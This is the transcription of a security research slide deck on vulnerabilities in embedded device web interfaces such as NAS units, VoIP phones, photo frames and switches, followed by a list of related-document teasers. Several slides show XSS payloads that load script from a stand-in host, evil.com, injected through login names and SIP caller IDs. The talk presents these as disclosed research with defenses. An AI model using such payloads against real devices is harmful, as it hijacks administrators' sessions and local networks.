Embedded Management Interfaces

Size: px
Start display at page:

Download "Embedded Management Interfaces"

Transcription

1 Stanford Computer Security Lab Embedded Management Interfaces Emerging Massive Insecurity Stanford Computer Security Lab

2 What this talk is about?

3 What this talk is about? Massively deployed devices

4 What this talk is about? Massively deployed devices Embedded web management interface

5 What this talk is about? Massively deployed devices Embedded web management interface How you can exploit these interfaces

6 What this talk is about? Massively deployed devices Embedded web management interface How you can exploit these interfaces What we can do about it

7 devices?

8 devices?

9 devices?

10 devices?

11 devices?

12 devices?

13 devices?

14 devices?

15 devices?

16 Web management interface Managing embedded devices via a web interface: Easier for users Cheaper for vendors

17 Internet 240M registered domains 72M active domains Source Netcraft

18 Web security prominence % Today: top server-side issue top client-side issue Source: Sans top 20 Source: MITRE CVE trends

19 Web application spectrum # users Popular Internet web sites Custom web applications Security research # of sites

20 Web application spectrum # users Popular Internet web sites Custom web applications devices? Consumer electronics Network infrastructure Security research # of sites

21 Embedded device prominence Embedded web applications are everywhere 100M+ WiFi access points also in millions of switches, printers, consumer electronics San Francisco WiFi access points Source: skyhookwireless

22 Embedded web servers will soon dominate 300 Growth Internet Embedded (NAS and photo frame only) 225 (Millions) Data : - Parks associates - Netcraft

23 Spectrum revisited # users Popular web applications Custom web applications Security research # of sites

24 Spectrum revisited # users Popular web applications devices Custom web applications Security research # of sites

25 Recipe for a disaster Vendors build their own web applications Standard web server (sometimes) Custom web application stack Weak web security New features/services added at a fast pace Vendors compete on number of services in product Interactions between services vulnerabilities

26 Some vendors got it right... Kodak 1

27 ... almost.

28 ... almost.

29 The result Vulnerabilities in every device we audited

30 Outline Audit methodology: auditing a zoo of devices Illustrative attacks Defenses and lessons learned

31 Stanford Computer Security Lab Methodology

32 Audit methodology

33 Audit methodology Brands

34 Audit methodology Brands Device types

35 Audit methodology Brands Vulnerability types Device types

36 Overall audit results

37 Overall audit results 8 categories of devices

38 Overall audit results 8 categories of devices 16 different brands

39 Overall audit results 8 categories of devices 16 different brands 23 devices

40 Overall audit results 8 categories of devices 16 different brands 23 devices 50+ vulnerabilities reported to CERT

41 Attack types Popular ones: Cross Site Scripting (XSS) Cross Site Request Forgeries (CSRF) Cross-Channel Scripting (XCS) attacks File security User authentication

42 Stored Cross Site Scripting (XSS) illustrated D-link DNS-323 Allows to share files Configured via Web

43 Stored XSS illustrated Web Form NAS Fill a http form <script>..</script> Attacker

44 Stored XSS illustrated Web Form file system NAS Fill a http form <script>..</script> Attacker

45 Stored XSS illustrated Web Form file system Web App NAS Fill a http form <script>..</script> reflect into the page: <script>..</script> Attacker

46 Stored XSS illustrated Web Form file system Web App NAS Fill a http form <script>..</script> reflect into the page: <script>..</script> Attacker

47 Attack result

48 Cross Site Request Forgery (CSRF) illustrated Netgear FS750T2 Intelligent switch Configured via Web

49 CSRF illustrated

50 CSRF illustrated 1 Administer the switch

51 CSRF illustrated 1 Administer the switch 2 Browse the web

52 CSRF illustrated 1 Administer the switch 2 Browse the web 3 Trigger POST (e.g. via Ads)

53 CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web 3 Trigger POST (e.g. via Ads)

54 CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web 3 Trigger POST (e.g. via Ads)

55 CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web 3 Trigger POST (e.g. via Ads)

56 Cross Channel Scripting (XCS) illustrated LaCie Ethernet disk mini Share access control Web interface Public FTP

57 XCS illustrated FTP server NAS upload the file: <script>..</script>.pdf Attacker

58 XCS illustrated FTP server file system NAS upload the file: <script>..</script>.pdf Attacker

59 XCS illustrated FTP server file system Web App NAS upload the file: <script>..</script>.pdf reflect the filename: <script>..</script>.pdf Attacker Admin Browser

60 XCS illustrated FTP server file system Web App NAS upload the file: <script>..</script>.pdf reflect the filename: <script>..</script>.pdf Attacker

61 Attack result

62 XCS: cross-channel scripting Alternate Channels Web attacker Device User Injection Storage Reflection

63 Devices as stepping stones

64 Devices as stepping stones 1 Administer the device

65 Devices as stepping stones 2 Browse internet 1 Administer the device Internet

66 Devices as stepping stones 2 Browse internet 1 Administer the device Internet 3 Trigger POST (e.g. via Ads)

67 Devices as stepping stones 2 Browse internet 4 infect the device Internet 3 Trigger POST (e.g. via Ads)

68 Devices as stepping stones 5 access files

69 Devices as stepping stones 6 Send malicious payload 5 access files

70 Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network

71 Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network

72 Brands

73 Devices

74 Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 framde NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability

75 Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 framde NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability

76 Devices by Brand Brand Camera LOM NAS Phone Photo Frame Printer Router Switch Allied Buffalo D-Link Dell estarling HP IBM Intel Kodak LaCie Linksys Netgear Panasonic QNAP Samsung SMC TrendNet Table 2: List of devices by brand

77 Attack surface Confidentiality Integrity Availability Access control Attribution

78 Attack surface result

79 Attack surface result Confidentiality 5 Steal private data

80 Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device

81 Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device

82 Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access control 23 Access files without password

83 Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access control 23 Access files without password Attribution 22 Don t log access

84 Stanford Computer Security Lab Illustrative Attacks

85 Login+Log XSS Quick warm-up: LOM LOM basics Log XSS

86 Login+Log XSS LOM basics Lights-out recovery, maintenance, inventory tracking PCI card and chipset varieties available Separate NIC and admin login* Low-security default settings Motherboard connection Usually invisible to OS

87 Login+Log XSS Log XSS Known for a decade Traditionally injected via DNS Also see recent IBM BladeCenter advisory

88 Persistant Log-based XSS

89 Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script>

90 Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog

91 Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog 3 Payload executes

92 Login+Log XSS attack result

93 Cross Channel Scripting (XCS) Moving on to real XCS VoIP phone Photo frame

94 SIP XCS VoIP phone Linksys SPA942 Web interface SIP support Call logs

95 SIP XCS

96 SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain

97 SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain 2 RTP: carries actual binary data

98 SIP XCS

99 SIP XCS 1 Attacker makes a call as <script src="//evil.com/"></script>

100 SIP XCS 1 Attacker makes a call as <script src="//evil.com/"></script> 2 Administrator accesses web interface

101 SIP XCS 1 Attacker makes a call as <script src="//evil.com/"></script> 2 Administrator accesses web interface 3 Payload executes

102 SIP XCS attack result

103 Photo frame sales

104 Photo frame XCS WiFi photo frame Samsung SPF85V RSS / URL feed Windows Live WMV / AVI

105 Photo frame XCS Fetch photos from the Internet. Watch movies too.

106 Photo frame XCS Fetch photos from the Internet. Watch movies too. Operation Use browser interface to set up You can also see the current photo! Many configuration fields: RSS, URLs, etc...

107 Photo frame XCS

108 Photo frame XCS 1 Attacker infects via CSRF

109 Photo frame XCS 1 Attacker infects via CSRF 2 User connects to manage

110 Photo frame XCS 1 Attacker infects via CSRF 2 User connects to manage 3 Payload executes

111 Photo frame XCS attack result

112 Photo frames as stepping stones

113 Photo frames as stepping stones 1 Frame gets infected via grandma s browser

114 Photo frames as stepping stones 2 Son connects to upload photos 1 Frame gets infected via grandma s browser

115 Photo frames as stepping stones 2 Son connects to upload photos 3 Intranet infected 1 Frame gets infected via grandma s browser

116 Photo frame XCS Bonus feature : Current photo visible without login

117 A vehicle for scams? estarling photo frame receive photos via Frame error! Call us predictable address

118 Stanford Computer Security Lab Big Picture

119 Big picture Embedded web servers are everywhere In homes, offices Various types and functions Massive attack surface (in aggregate) Can be use as stepping stones into LAN

120 Big picture Security: not a priority so far Single exploits: well known However, the trend is a concern

121 Big picture Security: not a priority so far Single exploits: well known However, the trend is a concern Rise of multi-protocol devices: XCS Rise of browser-os: 24x7 exploitability

122 Stanford Computer Security Lab Defenses

123 Defense approaches Today Internal audits by IT staff and end-users

124 Defense approaches Today Internal audits by IT staff and end-users Near-term SiteFirewall: IT, browser vendors

125 Defense approaches Today Internal audits by IT staff and end-users Near-term SiteFirewall: IT, browser vendors Long-term Server-side security gains

126 SiteFirewall Injected script can issue requests at will: <script src= > Before

127 SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet.

128 SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet.

129 SiteFirewall Page interactions with the Internet blocked. After

130 Server-side defenses Difficulties No standard platform to build for Adding insecure features: unavoidable

131 Server-side defenses Difficulties No standard platform to build for Adding insecure features: unavoidable

132 Server-side defenses Difficulties No standard platform to build for Adding insecure features: unavoidable Requirements Security is a top priority Performance trade-offs possible Architectural trade-offs: kernel vs. web server

133 Server-side defenses Opportunities Use captchas Process sandboxing Data storage and access model

134 Server-side defenses Opportunities Use captchas Process sandboxing Data storage and access model Future work: development framework Secure embedded web applications RoR too heavyweight in this context

135 Stanford Computer Security Lab One more thing

136 Another boring NAS device? SOHO NAS Buffalo LS-CHL BitTorrent support!

137 Massive exploitation Internet

138 Massive exploitation Create a bad torrent Internet Famous_movie.torrent

139 Massive exploitation Internet

140 Massive exploitation Internet

141 Massive exploitation takeover Internet

142 Massive exploitation takeover takeover Internet

143 Peer-to-peer XCS attack result

144 Conclusion Sticky technology Standardize... remote access firmware upgrade rendering to HTML configuration backup Thanks to Eric Lovett and Parks Associates!

145 Stanford Computer Security Lab Questions?

146 Configuration file XCS WiFi router Linksys WRT54G2 Standard features Config backup Mature technology...

147 Configuration file XCS

148 Configuration file XCS Save file Configuration file

149 Configuration file XCS Save file Configuration file Tampering with the file

150 Configuration file XCS Save file Configuration file Tampering with the file

151 Configuration file XCS Save file Restore file Configuration file Tampering with the file

152 Configuration file XCS attack result

153 An easy fix

154 An easy fix Sign with a device private key!

155 An easy fix Sign with a device private key!

156 What about arbitrary file inclusion?

157 What about arbitrary file inclusion?

158 What about arbitrary file inclusion?

159 More attacks: Switches Netgear switch Trendnet switch

160 More attacks: LOM IBM RSA II Intel vpro/amt

CIS 4360 Secure Computer Systems XSS

CIS 4360 Secure Computer Systems XSS CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection

More information

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Application Security through a Hacker s Eyes James Walden Northern Kentucky University Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways

More information

Hacking Intranet Websites from the Outside

Hacking Intranet Websites from the Outside 1 Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous" Black Hat (Japan) 10.05.2006 Jeremiah Grossman (Founder and CTO) WhiteHat Security 2 WhiteHat Sentinel -

More information

Release Notes Version 7.8

Release Notes Version 7.8 Please Read Before Updating Before installing any firmware version, be sure to make a backup of your configuration and read all release notes that apply to versions more recent than the one currently running

More information

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing Advancing Expertise in Security Testing Taming the Wild West Canberra, Australia 1 Who is this guy? Andrew

More information

The security of Mozilla Firefox s Extensions. Kristjan Krips

The security of Mozilla Firefox s Extensions. Kristjan Krips The security of Mozilla Firefox s Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting

More information

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel Don t blink or how to create secure software Bozhidar Bozhanov, CEO @ LogSentinel About me Senior software engineer and architect Founder & CEO @ LogSentinel Former IT and e-gov advisor to the deputy prime

More information

IRL: Live Hacking Demos!

IRL: Live Hacking Demos! SESSION ID: SBX2-R3 IRL: Live Hacking Demos! Omer Farooq Senior Software Engineer Independent Security Evaluators Rick Ramgattie Security Analyst Independent Security Evaluators What is the Internet of

More information

Web Application Penetration Testing

Web Application Penetration Testing Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate

More information

Getting over Ransomware - Plan your Strategy for more Advanced Threats

Getting over Ransomware - Plan your Strategy for more Advanced Threats Getting over Ransomware - Plan your Strategy for more Advanced Threats Kaspersky Lab Hong Kong Eric Kwok General Manager Lapcom Ltd. BEYOND ANTI-VIRUS: TRUE CYBERSECURITY FROM KASPERSKY LAB 20 years ago

More information

EasyCrypt passes an independent security audit

EasyCrypt passes an independent security audit July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored

More information

Barracuda Link Balancer

Barracuda Link Balancer Barracuda Networks Technical Documentation Barracuda Link Balancer Administrator s Guide Version 2.3 RECLAIM YOUR NETWORK Copyright Notice Copyright 2004-2011, Barracuda Networks www.barracuda.com v2.3-111215-01-1215

More information

The PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference

The PKI Lie. The OWASP Foundation  Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Copyright 2007 - The OWASP Foundation Permission is granted to copy,

More information

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication

More information

Imperva Incapsula Website Security

Imperva Incapsula Website Security Imperva Incapsula Website Security DA T A SH E E T Application Security from the Cloud Imperva Incapsula cloud-based website security solution features the industry s leading WAF technology, as well as

More information

Securing Access to Network Devices

Securing Access to Network Devices Securing Access to Network s Data Track Technology October, 2003 A corporate information security strategy will not be effective unless IT administrative services are protected through processes that safeguard

More information

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009 Securing Web Applications: Defense Mechanisms Kishin Fatnani Founder & Director K-Secure Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009 1 Agenda Current scenario in Web Application

More information

epldt Web Builder Security March 2017

epldt Web Builder Security March 2017 epldt Web Builder Security March 2017 TABLE OF CONTENTS Overview... 4 Application Security... 5 Security Elements... 5 User & Role Management... 5 User / Reseller Hierarchy Management... 5 User Authentication

More information

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing

More information

WEB SECURITY: XSS & CSRF

WEB SECURITY: XSS & CSRF WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often

More information

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14 Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.

More information

Information Security CS 526 Topic 11

Information Security CS 526 Topic 11 Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive

More information

SO YOU THINK YOU ARE PROTECTED? THINK AGAIN! NEXT GENERATION ENDPOINT SECURITY

SO YOU THINK YOU ARE PROTECTED? THINK AGAIN! NEXT GENERATION ENDPOINT SECURITY SO YOU THINK YOU ARE PROTECTED? THINK AGAIN! NEXT GENERATION ENDPOINT SECURITY www.securelink.net BACKGROUND Macro trends like cloud and mobility change the requirements for endpoint security. Data can

More information

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK Hacker Academy Ltd COURSES CATALOGUE Hacker Academy Ltd. LONDON UK TABLE OF CONTENTS Basic Level Courses... 3 1. Information Security Awareness for End Users... 3 2. Information Security Awareness for

More information

CSWAE Certified Secure Web Application Engineer

CSWAE Certified Secure Web Application Engineer CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized

More information

Securing ArcGIS for Server. David Cordes, Raj Padmanabhan

Securing ArcGIS for Server. David Cordes, Raj Padmanabhan Securing ArcGIS for Server David Cordes, Raj Padmanabhan Agenda Security in the context of ArcGIS for Server User and Role Considerations Identity Stores Authentication Securing web services Protecting

More information

idor Mobile Setup idor Mobile : idor Mobile System Manual V1.1 1

idor Mobile Setup idor Mobile : idor Mobile System Manual V1.1 1 idor Mobile Setup Table of Contents Login into the Web-GUI... 3 Network Settings... 4 Set Static IP Address... 5 Apartments... 7 Add an Apartment... 7 Edit an Apartment... 9 Delete an Apartment... 9 SIP

More information

CSC 482/582: Computer Security. Cross-Site Security

CSC 482/582: Computer Security. Cross-Site Security Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential

More information

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition Chapter 3 Investigating Web Attacks Objectives After completing this chapter, you should be able to: Recognize the indications

More information

Exploiting and Defending: Common Web Application Vulnerabilities

Exploiting and Defending: Common Web Application Vulnerabilities Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,

More information

Securing Your Web Application against security vulnerabilities. Alvin Wong, Brand Manager IBM Rational Software

Securing Your Web Application against security vulnerabilities. Alvin Wong, Brand Manager IBM Rational Software Securing Your Web Application against security vulnerabilities Alvin Wong, Brand Manager IBM Rational Software Agenda Security Landscape Vulnerability Analysis Automated Vulnerability Analysis IBM Rational

More information

Linksys Phone Adapter Can Connect To Login Server

Linksys Phone Adapter Can Connect To Login Server Linksys Phone Adapter Can Connect To Login Server Get support for Linksys Linksys AE1200 N300 Wireless-N USB Adapter. Installing the wrong software could create configuration issues for your network. Speak

More information

Web Security. Thierry Sans

Web Security. Thierry Sans Web Security Thierry Sans 1991 Sir Tim Berners-Lee Web Portals 2014 Customer Resources Managemen Accounting and Billing E-Health E-Learning Collaboration Content Management Social Networks Publishing Web

More information

Chapter 1 Getting Started with Switch Management

Chapter 1 Getting Started with Switch Management Chapter 1 Getting Started with Switch Management This section provides an overview of switch management, including the methods you can choose to start managing your NETGEAR GS700TS Gigabit Stackable Smart

More information

F5 Big-IP Application Security Manager v11

F5 Big-IP Application Security Manager v11 F5 F5 Big-IP Application Security Manager v11 Code: ACBE F5-ASM Days: 4 Course Description: This four-day course gives networking professionals a functional understanding of the BIG- IP LTM v11 system

More information

Security Course. WebGoat Lab sessions

Security Course. WebGoat Lab sessions Security Course WebGoat Lab sessions WebGoat Lab sessions overview Initial Setup Tamper Data Web Goat Lab Session 4 Access Control, session information stealing Lab Session 2 HTTP Basics Sniffing Parameter

More information

RKN 2015 Application Layer Short Summary

RKN 2015 Application Layer Short Summary RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,

More information

68 Insider Threat Red Flags

68 Insider Threat Red Flags 68 Insider Threat Red Flags Are you prepared to stop the insider threat? Enterprises of all shapes and sizes are taking a fresh look at their insider threat programs. As a company that s been in the insider

More information

Web Security II. Slides from M. Hicks, University of Maryland

Web Security II. Slides from M. Hicks, University of Maryland Web Security II Slides from M. Hicks, University of Maryland Recall: Putting State to HTTP Web application maintains ephemeral state Server processing often produces intermediate results; not long-lived

More information

SOURCEFIRE 3D SYSTEM RELEASE NOTES

SOURCEFIRE 3D SYSTEM RELEASE NOTES SOURCEFIRE 3D SYSTEM RELEASE NOTES Version 5.3.0.3 Original Publication: April 21, 2014 These release notes are valid for Version 5.3.0.3 of the Sourcefire 3D System. Even if you are familiar with the

More information

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent

More information

Web Security IV: Cross-Site Attacks

Web Security IV: Cross-Site Attacks 1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session

More information

Copyright

Copyright 1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?

More information

ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.

ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc. 1 ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS Waqas Nazir - CEO - DigitSec, Inc. EXPLOITATION AND SECURITY 2 OF SAAS APPLICATIONS OVERVIEW STATE OF SAAS SECURITY CHALLENGES WITH SAAS FORCE.COM

More information

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt Excerpts of Web Application Security focusing on Data Validation adapted for F.I.S.T. 2004, Frankfurt by fs Purpose of this course: 1. Relate to WA s and get a basic understanding of them 2. Understand

More information

The Internet of Things. Steven M. Bellovin November 24,

The Internet of Things. Steven M. Bellovin November 24, The Internet of Things Steven M. Bellovin November 24, 2014 1 What is the Internet of Things? Non-computing devices...... with CPUs... and connectivity (Without connectivity, it s a simple embedded system)

More information

V.7. zclock-30w Quick Start Guide

V.7. zclock-30w Quick Start Guide V.7 zclock-30w Quick Start Guide What this guide does: This guide will help you to quickly configure and set up the zclock30w, and will briefly summarize the steps to configure the unit wirelessly and

More information

Your Turn to Hack the OWASP Top 10!

Your Turn to Hack the OWASP Top 10! OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application

More information

Enterprise Cybersecurity Best Practices Part Number MAN Revision 006

Enterprise Cybersecurity Best Practices Part Number MAN Revision 006 Enterprise Cybersecurity Best Practices Part Number MAN-00363 Revision 006 April 2013 Hologic and the Hologic Logo are trademarks or registered trademarks of Hologic, Inc. Microsoft, Active Directory,

More information

Table of Contents. CRA-200 Analog Telephone Adapter 2 x Ethernet Port + 2 x VoIP Line. Quick Installation Guide. CRA-200 Quick Installation Guide

Table of Contents. CRA-200 Analog Telephone Adapter 2 x Ethernet Port + 2 x VoIP Line. Quick Installation Guide. CRA-200 Quick Installation Guide CRA-200 Analog Telephone Adapter 2 x Ethernet Port + 2 x VoIP Line Quick Installation Guide Table of Contents VoIP ATA Package Contents... 2 Checklist... 2 IMPORTANT SAFETY INSTRUCTIONS... 3 Connecting

More information

HT812/HT814 Firmware Release Note IMPORTANT UPGRADING NOTE

HT812/HT814 Firmware Release Note IMPORTANT UPGRADING NOTE HT812/HT814 Firmware Release Note IMPORTANT UPGRADING NOTE Once HT812/HT814 is upgraded to 1.0.3.2 or above, downgrading to 1.0.2.x firmware version or lower is not supported. Once HT812/HT814 is upgraded

More information

Applications Security

Applications Security Applications Security OWASP Top 10 PyCon Argentina 2018 Objectives Generate awareness and visibility on web-apps security Set a baseline of shared knowledge across the company Why are we here / Trigger

More information

Security Engineering by Ross Andersson Chapter 18. API Security. Presented by: Uri Ariel Nepomniashchy 31/05/2016

Security Engineering by Ross Andersson Chapter 18. API Security. Presented by: Uri Ariel Nepomniashchy 31/05/2016 Security Engineering by Ross Andersson Chapter 18 API Security Presented by: Uri Ariel Nepomniashchy 31/5/216 Content What is API API developing risks Attacks on APIs Summary What is API? Interface for

More information

Web Application Security. Philippe Bogaerts

Web Application Security. Philippe Bogaerts Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security

More information

OWASP Top 10 The Ten Most Critical Web Application Security Risks

OWASP Top 10 The Ten Most Critical Web Application Security Risks OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain

More information

WHY CSRF WORKS. Implicit authentication by Web browsers

WHY CSRF WORKS. Implicit authentication by Web browsers WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication

More information

Microlab 2005 Summer Internship. Subha Gollakota High School Junior Harker High San Jose, CA

Microlab 2005 Summer Internship. Subha Gollakota High School Junior Harker High San Jose, CA Microlab 2005 Summer Internship Subha Gollakota High School Junior Harker High San Jose, CA Agenda System administration Unix vs. Windows Terms Active Directory Proactive Security Measures Viruses and

More information

OpenID Security Analysis and Evaluation

OpenID Security Analysis and Evaluation University of British Columbia OpenID Security Analysis and Evaluation San-Tsai Sun, Kirstie Hawkey, Konstantin Beznosov Laboratory for Education and Research in Secure Systems Engineering (LERSSE) University

More information

Course 10972B: Administering the Web Server (IIS) Role of Windows Server

Course 10972B: Administering the Web Server (IIS) Role of Windows Server Course 10972B: Administering the Web Server (IIS) Role of Windows Server Course Outline Module 1: Understanding and Installing Internet Information Services In this module, you will learn about the infrastructure

More information

Put something on the internet - Get hacked. Beyond Security 1

Put something on the internet - Get hacked. Beyond Security 1 Put something on the internet - Get hacked 1 Agenda About me IoT IoT core problems Software Hardware Vulnerabilities What should I do? About me Maor Shwartz Been interested in the field of security since

More information

Protect your apps and your customers against application layer attacks

Protect your apps and your customers against application layer attacks Protect your apps and your customers against application layer attacks Development 1 IT Operations VULNERABILITY DETECTION Bots, hackers, and other bad actors will find and exploit vulnerabilities in web

More information

Computer Security CS 426 Lecture 41

Computer Security CS 426 Lecture 41 Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general

More information

Threat Modeling. Bart De Win Secure Application Development Course, Credits to

Threat Modeling. Bart De Win Secure Application Development Course, Credits to Threat Modeling Bart De Win bart.dewin@ascure.com Secure Application Development Course, 2009 Credits to Frank Piessens (KUL) for the slides 2 1 Overview Introduction Key Concepts Threats, Vulnerabilities,

More information

ISA564 SECURITY LAB. Code Injection Attacks

ISA564 SECURITY LAB. Code Injection Attacks ISA564 SECURITY LAB Code Injection Attacks Outline Anatomy of Code-Injection Attacks Lab 3: Buffer Overflow Anatomy of Code-Injection Attacks Background About 60% of CERT/CC advisories deal with unauthorized

More information

This FAQ is only applicable for hostings ordered after 23/6/2010

This FAQ is only applicable for hostings ordered after 23/6/2010 Webhosting FAQ This FAQ is only applicable for hostings ordered after 23/6/2010 1. How do I access my Webhosting control panel?... 1 2. On which server is my hosting set up (IP)?... 4 3. How do I install

More information

Unified CCX Administration Web Interface

Unified CCX Administration Web Interface The Unified CCX provides a multimedia (voice, data, and web) IP-enabled customer-care application environment, using VoIP technology that allows your Cisco Unified Communications network to share resources

More information

Designing and Building a Cybersecurity Program

Designing and Building a Cybersecurity Program Designing and Building a Cybersecurity Program Based on the NIST Cybersecurity Framework (CSF) Larry Wilson lwilson@umassp.edu ISACA Breakfast Meeting January, 2016 Designing & Building a Cybersecurity

More information

NET 311 INFORMATION SECURITY

NET 311 INFORMATION SECURITY NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)

More information

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability

